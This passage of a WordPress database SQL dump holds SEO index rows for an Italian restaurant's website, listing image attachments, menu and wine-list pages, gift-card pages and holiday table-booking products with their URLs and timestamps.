00:01:29',1,NULL,NULL,NULL,NULL,0,NULL),(112,NULL,NULL,449,'post','attachment',1,0,NULL,NULL,'eid-1','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/eid-1.png',NULL,'449','attachment-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/eid-1.png','449','attachment-image','{\"width\":603,\"height\":360,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/eid-1.png\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/eid-1.png\",\"size\":\"full\",\"id\":449,\"alt\":\"\",\"pixels\":217080,\"type\":\"image\\/png\"}',NULL,NULL,NULL,'2020-06-05 14:29:13','2020-10-15 00:01:29',1,NULL,NULL,NULL,NULL,0,NULL),(113,NULL,NULL,451,'post','attachment',1,0,NULL,NULL,'giftimg2-1','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/giftimg2-1.png',NULL,'451','attachment-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/giftimg2-1.png','451','attachment-image','{\"width\":283,\"height\":241,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/giftimg2-1.png\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/giftimg2-1.png\",\"size\":\"full\",\"id\":451,\"alt\":\"\",\"pixels\":68203,\"type\":\"image\\/png\"}',NULL,NULL,NULL,'2020-06-05 14:29:13','2020-10-15 00:01:29',1,NULL,NULL,NULL,NULL,0,NULL),(114,NULL,NULL,470,'post','attachment',1,0,NULL,NULL,'be-the-reason','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg',NULL,'470','attachment-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg','470','attachment-image','{\"width\":564,\"height\":415,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/be-the-reason.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/be-the-reason.jpg\",\"size\":\"full\",\"id\":470,\"alt\":\"\",\"pixels\":234060,\"type\":\"image\\/jpeg\"}',NULL,8,NULL,'2020-06-05 14:29:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(115,NULL,NULL,471,'post','attachment',1,0,NULL,NULL,'do-small-thing','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/do-small-thing.png',NULL,'471','attachment-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/do-small-thing.png','471','attachment-image','{\"width\":300,\"height\":409,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/do-small-thing.png\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/do-small-thing.png\",\"size\":\"full\",\"id\":471,\"alt\":\"\",\"pixels\":122700,\"type\":\"image\\/png\"}',NULL,NULL,NULL,'2020-06-05 14:29:13','2020-10-15 00:01:29',1,NULL,NULL,NULL,NULL,0,NULL),(116,'https://www.ristorantesolymar.it/vecchio/giftcard/template-sol-y-mar/','69:0c5e21eafd7602c638760d5d3690bf7f',468,'post','giftcard',1,0,NULL,NULL,'Template Sol Y mar','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png',NULL,'473','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png','473','featured-image','{\"width\":172,\"height\":108,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/buono.png\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/buono.png\",\"size\":\"full\",\"id\":473,\"alt\":\"\",\"pixels\":18576,\"type\":\"image\\/png\"}',NULL,NULL,NULL,'2020-06-05 14:29:13','2021-03-09 10:20:06',1,NULL,NULL,NULL,NULL,0,NULL),(117,'https://www.ristorantesolymar.it/vecchio/wp-content/uploads/2017/07/buono.png','77:8f903feed5aa0382ee0ebcd1b42077c3',473,'post','attachment',1,468,NULL,NULL,'buono','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png',NULL,'473','attachment-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png','473','attachment-image','{\"width\":172,\"height\":108,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/buono.png\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/buono.png\",\"size\":\"full\",\"id\":473,\"alt\":\"\",\"pixels\":18576,\"type\":\"image\\/png\"}',NULL,11,NULL,'2020-06-05 14:29:13','2021-03-09 10:20:06',1,NULL,NULL,NULL,NULL,1,NULL),(118,'https://www.ristorantesolymar.it/vecchio/wp-content/uploads/2017/12/capodanno2018.png','85:7c7ade1a542c2ace2dbc2c1404fc5baa',531,'post','attachment',1,529,NULL,NULL,'capodanno2018','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/12/capodanno2018.png',NULL,'531','attachment-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/12/capodanno2018.png','531','attachment-image','{\"width\":650,\"height\":809,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/12\\/capodanno2018.png\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/12\\/capodanno2018.png\",\"size\":\"full\",\"id\":531,\"alt\":\"\",\"pixels\":525850,\"type\":\"image\\/png\"}',NULL,NULL,NULL,'2020-06-05 14:29:13','2021-02-01 12:51:20',1,NULL,NULL,NULL,NULL,1,NULL),(119,'https://www.ristorantesolymar.it/vecchio/prodotto/prenotazione-tavolo-per-2-persone-san-valentino/','98:6c183fb59c1b98c9aa7e62c4b752ebe6',288,'post','product',1,0,NULL,NULL,'Prenotazione Tavolo per 2 Persone San Valentino','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',NULL,'212','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png','212','featured-image','{\"width\":235,\"height\":158,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"size\":\"full\",\"id\":212,\"alt\":\"\",\"pixels\":37130,\"type\":\"image\\/png\"}',0,15,NULL,'2020-06-05 14:29:13','2021-02-07 23:56:52',1,NULL,NULL,NULL,NULL,0,NULL),(120,'https://www.ristorantesolymar.it/vecchio/wp-content/uploads/2017/02/sanvalentino.jpg','84:b5aa149222ffa19574b48955170ce393',589,'post','attachment',1,288,NULL,NULL,'sanvalentino','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/02/sanvalentino.jpg',NULL,'589','attachment-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/02/sanvalentino.jpg','589','attachment-image','{\"width\":1024,\"height\":1024,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/02\\/sanvalentino.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/02\\/sanvalentino.jpg\",\"size\":\"full\",\"id\":589,\"alt\":\"\",\"pixels\":1048576,\"type\":\"image\\/jpeg\"}',NULL,NULL,NULL,'2020-06-05 14:29:13','2021-02-08 13:16:17',1,NULL,NULL,NULL,NULL,1,NULL),(121,'https://www.ristorantesolymar.it/vecchio/wp-content/uploads/2019/02/san-valentino-2019.jpg','90:3464bf383b2b19d0af3bd000b8c6b24e',728,'post','attachment',1,727,NULL,NULL,'san-valentino-2019','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2019/02/san-valentino-2019.jpg',NULL,'728','attachment-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2019/02/san-valentino-2019.jpg','728','attachment-image','{\"width\":1600,\"height\":1600,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2019\\/02\\/san-valentino-2019.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2019\\/02\\/san-valentino-2019.jpg\",\"size\":\"full\",\"id\":728,\"alt\":\"\",\"pixels\":2560000,\"type\":\"image\\/jpeg\"}',NULL,NULL,NULL,'2020-06-05 14:29:13','2021-02-01 11:04:35',1,NULL,NULL,NULL,NULL,1,NULL),(122,'https://www.ristorantesolymar.it/vecchio/wp-content/uploads/2019/04/happy-easter.jpg','84:993bcf0d9fa1fe06eead07e047ce2f8c',786,'post','attachment',1,784,NULL,NULL,'happy-easter','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter.jpg',NULL,'786','attachment-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter.jpg','786','attachment-image','{\"width\":800,\"height\":800,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2019\\/04\\/happy-easter.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2019\\/04\\/happy-easter.jpg\",\"size\":\"full\",\"id\":786,\"alt\":\"\",\"pixels\":640000,\"type\":\"image\\/jpeg\"}',NULL,NULL,NULL,'2020-06-05 14:29:14','2021-02-01 08:59:48',1,NULL,NULL,NULL,NULL,1,NULL),(2272,NULL,NULL,2712,'post','attachment',1,0,NULL,NULL,'landing-vector-img-1','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-1.png',NULL,'2712','attachment-image',NULL,NULL,NULL,'2712','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:55:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2273,NULL,NULL,2775,'post','attachment',1,0,NULL,NULL,'landing-img-14','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-14.jpg',NULL,'2775','attachment-image',NULL,NULL,NULL,'2775','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:55:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(124,'https://www.ristorantesolymar.it/vecchio/wp-content/uploads/2019/07/coupon-716.jpg','82:67890d5d6ac0c9fb47110ad69b8310eb',884,'post','attachment',1,875,NULL,NULL,'coupon-716','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2019/07/coupon-716.jpg',NULL,'884','attachment-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2019/07/coupon-716.jpg','884','attachment-image','{\"width\":626,\"height\":417,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2019\\/07\\/coupon-716.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2019\\/07\\/coupon-716.jpg\",\"size\":\"full\",\"id\":884,\"alt\":\"\",\"pixels\":261042,\"type\":\"image\\/jpeg\"}',NULL,NULL,NULL,'2020-06-05 14:29:14','2021-02-08 06:00:45',1,NULL,NULL,NULL,NULL,1,NULL),(125,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/birre/','62:d75ad60f977ac8d1a1c12069178fb922',69,'post','page',1,22,NULL,NULL,'Birre','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:14','2021-01-31 23:23:23',1,NULL,NULL,NULL,NULL,1,NULL),(126,'https://www.ristorantesolymar.it/vecchio/wp-content/uploads/2019/11/3-birra-2-4-19.docx','87:ca50767416169257af79189ad92f3dab',903,'post','attachment',2,69,NULL,NULL,'3-birra 2-4-19','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-05 14:29:14','2021-02-06 00:05:11',1,NULL,NULL,NULL,NULL,1,NULL),(127,'https://www.ristorantesolymar.it/vecchio/wp-content/uploads/2019/12/capodanno2019.jpg','85:0e83fad90726ebcdb5b7dfa9f3aca29e',910,'post','attachment',1,909,NULL,NULL,'capodanno2019','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2019/12/capodanno2019.jpg',NULL,'910','attachment-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2019/12/capodanno2019.jpg','910','attachment-image','{\"width\":710,\"height\":972,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2019\\/12\\/capodanno2019.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2019\\/12\\/capodanno2019.jpg\",\"size\":\"full\",\"id\":910,\"alt\":\"\",\"pixels\":690120,\"type\":\"image\\/jpeg\"}',NULL,NULL,NULL,'2020-06-05 14:29:14','2021-03-29 16:02:45',1,NULL,NULL,NULL,NULL,1,NULL),(128,NULL,NULL,944,'post','attachment',1,943,NULL,NULL,'solymar 14 febbraio','inherit',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2020/01/solymar-14-febbraio.jpg',NULL,'944','attachment-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2020/01/solymar-14-febbraio.jpg','944','attachment-image','{\"width\":1440,\"height\":1440,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2020\\/01\\/solymar-14-febbraio.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2020\\/01\\/solymar-14-febbraio.jpg\",\"size\":\"full\",\"id\":944,\"alt\":\"\",\"pixels\":2073600,\"type\":\"image\\/jpeg\"}',NULL,NULL,NULL,'2020-06-05 14:29:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(129,NULL,NULL,966,'post','attachment',1,0,NULL,NULL,'LAVORI IN CORSO','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2020/02/LAVORI-IN-CORSO.jpg',NULL,'966','attachment-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2020/02/LAVORI-IN-CORSO.jpg','966','attachment-image','{\"width\":1080,\"height\":1080,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2020\\/02\\/LAVORI-IN-CORSO.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2020\\/02\\/LAVORI-IN-CORSO.jpg\",\"size\":\"full\",\"id\":966,\"alt\":\"\",\"pixels\":1166400,\"type\":\"image\\/jpeg\"}',NULL,NULL,NULL,'2020-06-05 14:29:14','2020-10-15 00:01:29',1,NULL,NULL,NULL,NULL,0,NULL),(130,'https://www.ristorantesolymar.it/vecchio/menu/menu-bambini/','59:9685db7133bc58fb1bbd2ecef64d7e52',14,'post','page',1,10,NULL,NULL,'Menù Bambini','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:14','2021-02-01 04:05:57',1,NULL,NULL,NULL,NULL,1,NULL),(132,'https://www.ristorantesolymar.it/vecchio/contatti/','50:221bb0746cd7f5cbee5522227160b447',28,'post','page',1,0,NULL,NULL,'Contatti','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/04/sol-y-mar-logo-150.png',NULL,'198','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/04/sol-y-mar-logo-150.png','198','featured-image','{\"width\":237,\"height\":150,\"url\":\"https://www.ristorantesolymar.it/wp-content/uploads/2016/04/sol-y-mar-logo-150.png\",\"path\":\"/home/baltazar/ristorantesolymar.it/wp-content/uploads/2016/04/sol-y-mar-logo-150.png\",\"size\":\"full\",\"id\":198,\"alt\":\"sol y mar\",\"pixels\":35550,\"type\":\"image/png\"}',0,0,NULL,'2020-06-05 14:29:14','2021-01-31 22:17:05',1,NULL,NULL,NULL,NULL,0,NULL),(133,'https://www.ristorantesolymar.it/vecchio/menu/pesce-crudo/','58:11dbc3e3bb0ca232d2f3fcd276d7ad10',49,'post','page',1,10,NULL,NULL,'Pesce Crudo','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:15','2021-02-01 00:46:02',1,NULL,NULL,NULL,NULL,1,NULL),(134,'https://www.ristorantesolymar.it/vecchio/menu/la-pasta/','55:4e8d774b81ce1d593aeb28dc7d18ca17',51,'post','page',1,10,NULL,NULL,'La Pasta','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:15','2021-02-01 00:45:59',1,NULL,NULL,NULL,NULL,1,NULL),(135,'https://www.ristorantesolymar.it/vecchio/menu/i-dolci/','54:364b6311c3631cf3129c213c5b11dd02',54,'post','page',1,10,NULL,NULL,'I Dolci','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:15','2021-02-01 00:45:57',1,NULL,NULL,NULL,NULL,1,NULL),(136,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/franciacorta/','69:10a2cfdd21a4a03cb5d888eceddebabb',71,'post','page',1,22,NULL,NULL,'Le mille e una bollicina','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:15','2021-01-31 23:23:20',1,NULL,NULL,NULL,NULL,1,NULL),(137,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/francia-champagne/','74:bc469a71edd2be1fc192ddc45fd15d88',75,'post','page',1,22,NULL,NULL,'Le mille e una bollicina','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:15','2021-01-31 23:23:15',1,NULL,NULL,NULL,NULL,1,NULL),(138,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/i-blanc-de-noir/','72:244a5e0bf373596b27aa5b1f0e11c9fe',77,'post','page',1,22,NULL,NULL,'Franciacorta','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:15','2021-01-31 23:19:21',1,NULL,NULL,NULL,NULL,1,NULL),(139,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/champagne-assemblaggi/','78:9164b37a74a575e384af5e27d90b1b89',79,'post','page',1,22,NULL,NULL,'Francia Champagne','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:15','2021-01-31 23:19:18',1,NULL,NULL,NULL,NULL,1,NULL),(140,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/assemblaggi-e-rose/','75:7c879e4c1e64d6f2b0f10594530ad7fb',81,'post','page',1,22,NULL,NULL,'Assemblaggi','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:15','2021-01-31 23:19:16',1,NULL,NULL,NULL,NULL,1,NULL),(141,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/emilia-romagna-val-daosta/','82:c952dc541489254541ff2bd75e19c095',83,'post','page',1,22,NULL,NULL,'Piemonte','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:15','2021-01-31 23:19:13',1,NULL,NULL,NULL,NULL,1,NULL),(142,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/friuli-venezia-giulia/','78:a61c0cad282494368252fcb7d47897eb',85,'post','page',1,22,NULL,NULL,'Trentino Alto Adige','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:15','2021-01-31 23:13:18',1,NULL,NULL,NULL,NULL,1,NULL),(143,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/abruzzo-campania/','73:756c66ecf78afdbeb8a28d9857dec221',89,'post','page',1,22,NULL,NULL,'Marche','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:15','2021-01-31 23:13:13',1,NULL,NULL,NULL,NULL,1,NULL),(144,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/sicilia-sardegna/','73:fa9ae847f249ced99181354c15d9002a',91,'post','page',1,22,NULL,NULL,'Puglia','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:15','2021-01-31 23:13:10',1,NULL,NULL,NULL,NULL,1,NULL),(146,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/austria-germania-spagna-nuova-zelanda/','94:16dc8c5188baed4a318e6385e7052a0c',96,'post','page',1,22,NULL,NULL,'Sicilia','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:15','2021-01-31 23:08:12',1,NULL,NULL,NULL,NULL,1,NULL),(148,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/vini-rossi/','67:499acfccb1027d6549dc2e16a9eb07e3',100,'post','page',1,22,NULL,NULL,'Vini Rossi','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:15','2021-01-31 23:08:10',1,NULL,NULL,NULL,NULL,1,NULL),(149,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/piemonte-liguria-lombardia/','83:6b5ca81523e480e540276370a38c8c70',102,'post','page',1,22,NULL,NULL,'Assemblaggi','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:15','2021-01-31 23:08:07',1,NULL,NULL,NULL,NULL,1,NULL),(150,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/trentino-veneto/','72:561599398022772935902e0494d90d46',104,'post','page',1,22,NULL,NULL,'I vini bianchi italiani','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:16','2021-01-31 23:08:04',1,NULL,NULL,NULL,NULL,1,NULL),(151,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/i-piccoli-formati-da-0-375/','83:b27b563384325b304441f84f6b6bac24',106,'post','page',1,22,NULL,NULL,'Vini al bicchiere','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-05 14:29:16','2021-01-31 23:03:36',1,NULL,NULL,NULL,NULL,1,NULL),(152,'https://www.ristorantesolymar.it/vecchio/info-privacy/','54:cd7e4d461de94f4ad10a13af4bc1eb54',172,'post','page',1,0,NULL,NULL,'Privacy','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,13,NULL,'2020-06-05 14:29:16','2021-01-31 23:03:28',1,NULL,NULL,NULL,NULL,0,NULL),(153,'https://www.ristorantesolymar.it/vecchio/gift-card/','51:1089014b4c5a07ec4864a9204d95310a',402,'post','page',1,0,NULL,NULL,'Gift Card','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,'2020-06-05 14:29:16','2021-01-31 21:19:23',1,NULL,NULL,NULL,NULL,0,NULL),(154,'https://www.ristorantesolymar.it/vecchio/instagram/','51:b468366bf32560baea5aa57bc56ecc50',712,'post','page',1,0,NULL,NULL,'Instagram','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,'2020-06-05 14:29:16','2021-01-31 22:53:51',1,NULL,NULL,NULL,NULL,0,NULL),(155,'https://www.ristorantesolymar.it/vecchio/gift-card-balance/','59:32665452210623cac7b04442f69922d5',717,'post','page',1,0,NULL,NULL,'Gift Card Balance','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,'2020-06-05 14:29:16','2021-01-31 22:53:48',1,NULL,NULL,NULL,NULL,0,NULL),(157,NULL,NULL,965,'post','popupbuilder',1,0,NULL,NULL,'Lavori in corso &#8211; Riapertura marzo 2020','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,'2020-06-05 14:29:16','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(160,'https://www.ristorantesolymar.it/vecchio/2016/03/07/menu-di-pasqua-2016/','72:5c1224b711efd6c826e787b868a0ac45',187,'post','post',2,0,NULL,NULL,'Menù di Pasqua 2016','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-05 14:29:17','2021-03-09 07:06:11',1,NULL,NULL,NULL,NULL,0,NULL),(161,NULL,NULL,213,'post','product',1,0,NULL,NULL,'Prenotazione Tavolo per 3 Persone &#8211; Capodanno 